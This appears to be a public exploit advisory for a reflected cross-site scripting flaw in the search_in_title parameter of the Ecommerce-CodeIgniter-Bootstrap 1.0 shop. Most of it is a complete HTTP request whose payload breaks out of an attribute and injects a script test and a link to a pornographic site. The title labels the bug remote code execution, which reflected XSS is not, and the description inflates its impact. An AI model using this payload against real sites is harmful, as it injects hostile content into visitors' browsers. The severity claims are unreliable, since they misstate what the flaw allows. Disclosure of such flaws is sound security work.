## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE
## Author: nu11secur1ty
## Date: 10.29.2022
## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap
## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap

## Description:
The value of the search_in_title request parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the
search_in_title parameter.
The malicious user can use this vulnerability to exploit every user of
this system to make them a bot machine and etc.

[+] Exploit:

```POST
GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

# Proof and Exploit:
[href](https://streamable.com/y3q67i)